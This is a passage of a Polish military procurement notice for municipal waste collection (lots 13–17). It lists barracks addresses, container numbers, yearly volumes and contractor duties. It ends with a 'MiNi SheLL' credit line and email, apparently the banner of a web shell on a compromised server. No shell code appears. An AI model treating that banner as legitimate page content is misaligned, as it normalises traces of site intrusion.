4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet

W zadaniu nr 12 wykonawca zobowiązuje się do:
1.	wyposażenia posesji w sprawne pojemniki ze szczelnymi pokrywami, do gromadzenia stałych odpadów komunalnych, pojemniki będą własnością Wykonawcy, 
2.	podstawienia pojemników do segregacji (zbiórki surowców wtórnych), pojemniki będą własnością Wykonawcy, 
3.	pojemniki o których mowa w punkcie 1 i 2 zostaną ustawione w miejscach wskazanych przez użytkownika - przedstawiciela Zamawiającego,
4.	systematycznego usuwania odpadów gromadzonych we wszystkich pojemnikach, zgodnie z przyjętymi w umowie ustaleniami.
5.	usunięcia odpadów zalegających poza pojemnikami w przypadku ich przepełnienia spowodowanego niedotrzymaniem ustalonego terminu wywozu,
6.	wymiany podstawionych pojemników uszkodzonych lub zniszczonych w wyniku bieżącej eksploatacji,
7.	utrzymywania podstawionych pojemników w czystości, zgodnie z ustaleniami zawartymi w umowie,
8.	wystawiania pojemników z odpadami oraz ich wstawiania po opróżnieniu
9.	składowania odpadów na wyznaczonym do tego celu składowisku odpadów lub przekazanie do unieszkodliwienia,
10.	udostępniania w razie potrzeby dodatkowych pojemników i opróżniania ich wg cen zgodnych z zawartą umową.
11.	w dniu podpisania umowy przedstawi wykaz pracowników oraz sprzętu, przewidzianych do bezpośredniego wykonania czynności wynikających z zamówienia,
12.	każdorazowe wykonanie usługi odbywać się będzie na zgłoszenie telefoniczne uprawnionego przedstawiciela obsługiwanego kompleksu Zamawiającego - termin wykonania usługi nie później niż 24 godziny od zgłoszenia.

Przewiduje się, że ilość gromadzonych odpadów z  segregacji stanowi ok. 15% wszystkich odpadów komunalnych.

Podane ilości przedmiotu zamówienia są ilościami szacunkowymi. Rozliczane będą faktycznie wywiezione m3 nieczystości..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13: rejon Wojskowej Administracji Koszar  Rzeszów, 1 punkt odbioru, (szac. ilość odpadów: 9 m3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 13 obejmuje wywóz odpadów komunalnych z rejonu Wojskowej Administracji Koszar Rzeszów, w ilości    9 m3/rok, 1 punkt odbioru.


1.
1.	Miejsce wykonywania usługi		ul. Kościuszki 24, 38-200 Jasło
2.	Ilość i rodzaj pojemników:	Do podstawienia: 2 pojemniki 120L (0,12 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	9 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet

W zadaniu nr 12 wykonawca zobowiązuje się do:
1.	wyposażenia posesji w sprawne pojemniki ze szczelnymi pokrywami, do gromadzenia stałych odpadów komunalnych, pojemniki będą własnością Wykonawcy, 
2.	podstawienia pojemników do segregacji (zbiórki surowców wtórnych), pojemniki będą własnością Wykonawcy, 
3.	pojemniki o których mowa w punkcie 1 i 2 zostaną ustawione w miejscach wskazanych przez użytkownika - przedstawiciela Zamawiającego,
4.	systematycznego usuwania odpadów gromadzonych we wszystkich pojemnikach, zgodnie z przyjętymi w umowie ustaleniami.
5.	usunięcia odpadów zalegających poza pojemnikami w przypadku ich przepełnienia spowodowanego niedotrzymaniem ustalonego terminu wywozu,
6.	wymiany podstawionych pojemników uszkodzonych lub zniszczonych w wyniku bieżącej eksploatacji,
7.	utrzymywania podstawionych pojemników w czystości, zgodnie z ustaleniami zawartymi w umowie,
8.	wystawiania pojemników z odpadami oraz ich wstawiania po opróżnieniu
9.	składowania odpadów na wyznaczonym do tego celu składowisku odpadów lub przekazanie do unieszkodliwienia,
10.	udostępniania w razie potrzeby dodatkowych pojemników i opróżniania ich wg cen zgodnych z zawartą umową.
11.	w dniu podpisania umowy przedstawi wykaz pracowników oraz sprzętu, przewidzianych do bezpośredniego wykonania czynności wynikających z zamówienia,
12.	każdorazowe wykonanie usługi odbywać się będzie na zgłoszenie telefoniczne uprawnionego przedstawiciela obsługiwanego kompleksu Zamawiającego - termin wykonania usługi do 3 dni roboczych od daty od zgłoszenia.

Przewiduje się, że ilość gromadzonych odpadów z  segregacji stanowi ok. 15% wszystkich odpadów komunalnych.

Podane ilości przedmiotu zamówienia są ilościami szacunkowymi. Rozliczane będą faktycznie wywiezione m3 nieczystości..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14: rejon Wojskowej Administracji Koszar  Rzeszów, 2 punkty odbioru, (szac. ilość odpadów: 490 m3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 14 obejmuje wywóz odpadów komunalnych z rejonu Wojskowej Administracji Koszar Rzeszów w ilości 490 m3/rok, 2 punkty odbioru.

1.
1.	Miejsce wykonywania usługi		Trzcianiec, 38-712 Trzcianiec, gm. Ustrzyki Dolne 
2.	Ilość i rodzaj pojemników:	W posiadaniu: 1 pojemnik KP-7 (7 m3) 
3.	Szacunkowa ilość odpadów w skali 1 roku	470 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet

2.
1.	Miejsce wykonywania usługi		Rajskie, 38-613 Rajskie, gm. Solina
2.	Ilość i rodzaj pojemników:	Do podstawienia 2 pojemniki 1100L (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	20 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet

W zadaniu nr 14 wykonawca zobowiązuje się do:
1.	wyposażenia posesji w sprawne pojemniki ze szczelnymi pokrywami, do gromadzenia stałych odpadów komunalnych, pojemniki będą własnością Wykonawcy, 
2.	podstawienia pojemników do segregacji (zbiórki surowców wtórnych), pojemniki będą własnością Wykonawcy, 
3.	pojemniki o których mowa w punkcie 1 i 2 zostaną ustawione w miejscach wskazanych przez użytkownika - przedstawiciela Zamawiającego,
4.	systematycznego usuwania odpadów gromadzonych we wszystkich pojemnikach, zgodnie z przyjętymi w umowie ustaleniami.
5.	usunięcia odpadów zalegających poza pojemnikami w przypadku ich przepełnienia spowodowanego niedotrzymaniem ustalonego terminu wywozu,
6.	wymiany podstawionych pojemników uszkodzonych lub zniszczonych w wyniku bieżącej eksploatacji,
7.	utrzymywania podstawionych pojemników w czystości, zgodnie z ustaleniami zawartymi w umowie,
8.	wystawiania pojemników z odpadami oraz ich wstawiania po opróżnieniu
9.	składowania odpadów na wyznaczonym do tego celu składowisku odpadów lub przekazanie do unieszkodliwienia,
10.	udostępniania w razie potrzeby dodatkowych pojemników i opróżniania ich wg cen zgodnych z zawartą umową.
11.	w dniu podpisania umowy przedstawi wykaz pracowników oraz sprzętu, przewidzianych do bezpośredniego wykonania czynności wynikających z zamówienia,
12.	każdorazowe wykonanie usługi odbywać się będzie na zgłoszenie telefoniczne uprawnionego przedstawiciela obsługiwanego kompleksu Zamawiającego - termin wykonania usługi nie później niż 24 godziny od zgłoszenia.


Przewiduje się, że ilość gromadzonych odpadów z  segregacji stanowi ok. 15% wszystkich odpadów komunalnych.

Podane ilości przedmiotu zamówienia są ilościami szacunkowymi. Rozliczane będą faktycznie wywiezione m3 nieczystości..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie nr 15: rejon Wojskowej Administracji Koszar  Rzeszów, 9 punktów odbioru, (szac. ilość odpadów: 2250 m3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 15 obejmuje wywóz odpadów komunalnych z rejonu Wojskowej Administracji Koszar Rzeszów w ilości    2250 m3/rok, 9 punktów odbioru.

1.
1.	Miejsce wykonywania usługi		ul. Reformacka 5, Rzeszów
2.	Ilość i rodzaj pojemników:	Do podstawienia: 2 pojemniki 1100L (1,1 m3)  lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	40 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet

2.
1.	Miejsce wykonywania usługi		ul Langiewicza 4, Rzeszów
2.	Ilość  i rodzaj pojemników:	Do podstawienia: 6 pojemników 1100L (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	460 m3 
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet

3.
1.	Miejsce wykonywania usługi		ul. Krakowska 11b, Rzeszów
2.	Ilość i rodzaj pojemników:	Do podstawienia: 6 pojemników 1100L (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	290 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet

4.
1.	Miejsce wykonywania usługi		ul. Hoffmanowej, Rzeszów
2.	Ilość i rodzaj pojemników:	Do podstawienia:  2 pojemniki 1100L (1,1 m3)  lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	75 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet

5.
1.	Miejsce wykonywania usługi		ul. Konopnickiej 5, Rzeszów
2.	Ilość i rodzaj pojemników:	Do podstawienia: 3 pojemniki 1100L (1,1 m3)  lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	115 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet
6.
1.	Miejsce wykonywania usługi		ul. Strzelnicza 9, Rzeszów
2.	Ilość i rodzaj pojemników:	Do podstawienia: 1 pojemnik 1100L (1,1 m3)  lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionemu.
3.	Szacunkowa ilość odpadów w skali 1 roku	20 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet




7.
1.	Miejsce wykonywania usługi		ul. Dąbrowskiego 22, Rzeszów
2.	Ilość i rodzaj pojemników:	Do podstawienia:  11 pojemników 1100L (1,1 m3)  lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	690 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	2 komplety
8.
1.	Miejsce wykonywania usługi		ul. Lwowska 5, Rzeszów
2.	Ilość i rodzaj pojemników:	Do podstawienia: 7 pojemników 1100L (1,1 m3)  lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	440 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet
9.
1.	Miejsce wykonywania usługi		ul. Lwowska 4, Rzeszów
2.	Ilość i rodzaj pojemników:	Do podstawienia: 3 pojemniki 1100L (1,1 m3)  lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	120 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet

W zadaniu nr 15 wykonawca zobowiązuje się do:
1.	wyposażenia posesji w sprawne pojemniki ze szczelnymi pokrywami, do gromadzenia stałych odpadów komunalnych, pojemniki będą własnością Wykonawcy, 
2.	podstawienia pojemników do segregacji (zbiórki surowców wtórnych), pojemniki będą własnością Wykonawcy, 
3.	pojemniki o których mowa w punkcie 1 i 2 zostaną ustawione w miejscach wskazanych przez użytkownika - przedstawiciela Zamawiającego,
4.	systematycznego usuwania odpadów gromadzonych we wszystkich pojemnikach, zgodnie z przyjętymi w umowie ustaleniami.
5.	usunięcia odpadów zalegających poza pojemnikami w przypadku ich przepełnienia spowodowanego niedotrzymaniem ustalonego terminu wywozu,
6.	wymiany podstawionych pojemników uszkodzonych lub zniszczonych w wyniku bieżącej eksploatacji,
7.	utrzymywania podstawionych pojemników w czystości, zgodnie z ustaleniami zawartymi w umowie,
8.	wystawiania pojemników z odpadami oraz ich wstawiania po opróżnieniu
9.	składowania odpadów na wyznaczonym do tego celu składowisku odpadów lub przekazanie do unieszkodliwienia,
10.	udostępniania w razie potrzeby dodatkowych pojemników i opróżniania ich wg cen zgodnych z zawartą umową.
11.	w dniu podpisania umowy przedstawi wykaz pracowników oraz sprzętu, przewidzianych do bezpośredniego wykonania czynności wynikających z zamówienia,
12.	każdorazowe wykonanie usługi odbywać się będzie na zgłoszenie telefoniczne uprawnionego przedstawiciela obsługiwanego kompleksu Zamawiającego - termin wykonania usługi nie później niż 24 godziny od zgłoszenia.

Przewiduje się, że ilość gromadzonych odpadów z  segregacji stanowi ok. 15% wszystkich odpadów komunalnych.

Podane ilości przedmiotu zamówienia są ilościami szacunkowymi. Rozliczane będą faktycznie wywiezione m3 nieczystości..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie nr 16: rejon Wojskowej Administracji Koszar  Stawy, 2 punkty odbioru, (szac. ilość odpadów: 540 m3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 16 obejmuje wywóz odpadów komunalnych z rejonu Wojskowej Administracji Koszar Stawy w ilości   540 m3/rok,  2 punkty odbioru.
1.
1.	Miejsce wykonywania usługi		JW. 4824 Stawy, 08-505 Dęblin
2.	Ilość i rodzaj pojemników:	Do podstawienia: 5 pojemników 1100L (1,1 m3) i 6 pojemników 110L (0,11m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym. 
3.	Szacunkowa ilość odpadów w skali 1 roku	440 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	3 komplety
2.
1.	Miejsce wykonywania usługi		Stężyca, ul. Dęblińska
2.	Ilość i rodzaj pojemników:	Do podstawienia: 2 pojemniki 1100L (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionemu.
3.	Szacunkowa ilość odpadów w skali 1 roku	100 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet

W zadaniu nr 16 wykonawca zobowiązuje się do:
1.	wyposażenia posesji w sprawne pojemniki ze szczelnymi pokrywami, do gromadzenia stałych odpadów komunalnych, pojemniki będą własnością Wykonawcy, 
2.	podstawienia pojemników do segregacji (zbiórki surowców wtórnych), pojemniki będą własnością Wykonawcy, 
3.	pojemniki o których mowa w punkcie 1 i 2 zostaną ustawione w miejscach wskazanych przez użytkownika - przedstawiciela Zamawiającego,
4.	systematycznego usuwania odpadów gromadzonych we wszystkich pojemnikach, zgodnie z przyjętymi w umowie ustaleniami.
5.	usunięcia odpadów zalegających poza pojemnikami w przypadku ich przepełnienia spowodowanego niedotrzymaniem ustalonego terminu wywozu,
6.	wymiany podstawionych pojemników uszkodzonych lub zniszczonych w wyniku bieżącej eksploatacji,
7.	utrzymywania podstawionych pojemników w czystości, zgodnie z ustaleniami zawartymi w umowie,
8.	wystawiania pojemników z odpadami oraz ich wstawiania po opróżnieniu
9.	składowania odpadów na wyznaczonym do tego celu składowisku odpadów lub przekazanie do unieszkodliwienia,
10.	udostępniania w razie potrzeby dodatkowych pojemników i opróżniania ich wg cen zgodnych z zawartą umową.
11.	w dniu podpisania umowy przedstawi wykaz pracowników oraz sprzętu, przewidzianych do bezpośredniego wykonania czynności wynikających z zamówienia,
12.	każdorazowe wykonanie usługi odbywać się będzie na zgłoszenie telefoniczne uprawnionego przedstawiciela obsługiwanego kompleksu Zamawiającego - termin wykonania usługi do 2 dni roboczych od daty zgłoszenia.


Przewiduje się, że ilość gromadzonych odpadów z  segregacji stanowi ok. 15% wszystkich odpadów komunalnych.

Podane ilości przedmiotu zamówienia są ilościami szacunkowymi. Rozliczane będą faktycznie wywiezione m3 nieczystości..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie nr 17: rejon Wojskowej Administracji Koszar  Żurawica, 6 punktów odbioru, (szac. ilość odpadów: 2460 m3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 17 obejmuje wywóz odpadów komunalnych z rejonu Wojskowej Administracji Koszar Żurawica w ilości   2460 m3/rok, 6 punktów odbioru.
1.
1.	Miejsce wykonywania usługi		Pikulice, 37-700 Przemyśl
2.	Ilość i rodzaj pojemników:	Do podstawienia 2 pojemniki 240 L (0,24 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionemu.
3.	Szacunkowa ilość odpadów w skali 1 roku	6 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 pojemnik 240L (0,24 m3) na makulaturę

 2.
1.	Miejsce wykonywania usługi		ul. Wojska Polskiego 22, 37-710 Żurawica
2.	Ilość i rodzaj pojemników:	Do podstawienia: 17 pojemników 1100L (1,1 m3) i 5 pojemników 240L lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	940 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	4 komplety 

3.
1.	Miejsce wykonywania usługi		ul. 3-go Maja, 37-700 Przemyśl
2.	Ilość  i rodzaj pojemników:	Do podstawienia: 1 pojemnik 1100L  (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionemu.
3.	Szacunkowa ilość odpadów w skali 1 roku	30 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet 

4.
1.	Miejsce wykonywania usługi		ul. Okrzei, 37-700 Przemyśl
2.	Ilość i rodzaj pojemników:	Do podstawienia: 4 pojemniki 1100L  (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	340 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	2 komplety
5.
1.	Miejsce wykonywania usługi		ul. 29 Listopada, 37-700 Przemyśl
2.	Ilość i rodzaj pojemników:	Do podstawienia: 1 pojemnik KP-7 (7 m3), 2 pojemniki 1100L (1,1 m3) i 3 pojemniki 240L (0,24 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	820 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	2 komplety

6.
1.	Miejsce wykonywania usługi		ul. 29 Listopada, 37-700 Przemyśl
2.	Ilość i rodzaj pojemników:	Do podstawienia: 3 pojemniki 1100L  (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	324 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet

W zadaniu nr 17 wykonawca zobowiązuje się do:
1.	wyposażenia posesji w sprawne pojemniki ze szczelnymi pokrywami, do gromadzenia stałych odpadów komunalnych, pojemniki będą własnością Wykonawcy, 
2.	podstawienia pojemników do segregacji (zbiórki surowców wtórnych), pojemniki będą własnością Wykonawcy, 
3.	pojemniki o których mowa w punkcie 1 i 2 zostaną ustawione w miejscach wskazanych przez użytkownika - przedstawiciela Zamawiającego,
4.	systematycznego usuwania odpadów gromadzonych we wszystkich pojemnikach, zgodnie z przyjętymi w umowie ustaleniami.
5.	usunięcia odpadów zalegających poza pojemnikami w przypadku ich przepełnienia spowodowanego niedotrzymaniem ustalonego terminu wywozu,
6.	wymiany podstawionych pojemników uszkodzonych lub zniszczonych w wyniku bieżącej eksploatacji,
7.	utrzymywania podstawionych pojemników w czystości, zgodnie z ustaleniami zawartymi w umowie,
8.	wystawiania pojemników z odpadami oraz ich wstawiania po opróżnieniu
9.	składowania odpadów na wyznaczonym do tego celu składowisku odpadów lub przekazanie do unieszkodliwienia,
10.	udostępniania w razie potrzeby dodatkowych pojemników i opróżniania ich wg cen zgodnych z zawartą umową.
11.	w dniu podpisania umowy przedstawi wykaz pracowników oraz sprzętu, przewidzianych do bezpośredniego wykonania czynności wynikających z zamówienia,
12.	każdorazowe wykonanie usługi odbywać się będzie na zgłoszenie telefoniczne uprawnionego przedstawiciela obsługiwanego kompleksu Zamawiającego - termin wykonania usługi nie później niż 24 godziny od zgłoszenia.
Przewiduje się, że ilość gromadzonych odpadów z  segregacji stanowi ok. 15% wszystkich odpadów komunalnych.

Podane ilości przedmiotu zamówienia są ilościami szacunkowymi. Rozliczane będą faktycznie wywiezione m3 nieczystości..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com